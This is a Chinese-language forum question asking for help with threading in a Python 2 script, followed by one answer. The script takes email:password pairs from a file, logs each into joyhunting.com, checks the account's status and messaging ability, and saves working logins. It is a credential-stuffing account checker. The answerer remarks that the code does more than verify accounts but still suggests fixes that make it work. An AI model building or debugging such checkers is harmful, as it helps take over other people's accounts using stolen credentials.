Python 线程队列问题
大家好。
我写了一个Python脚本,用线程来检查一些账户在某个网站上是否存在。
当我运行一个线程时,一切都很顺利,但如果我增加到3到5个线程,
结果和一个线程时差别就很大。我手动检查过,
发现增加线程后结果并不正确。
我觉得我的一些线程代码需要调整,或者使用队列模块怎么样?
有没有人能给我建议或者帮我调整一下我的脚本?谢谢大家!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
1 个回答
0
你能具体说明一下有什么不同的结果吗?
从我看到的情况来看,这段代码做的事情远不止验证账户。
从我看到的,你是从多个线程向一个文件里添加内容,我觉得这样做是不安全的。
另外,尽我所知,Mechanize会为所有请求使用共享的cookie存储,所以它们可能会相互干扰。建议在run()
里面使用单独的mechanize.Browser()
,而不是mechanize.Request()
。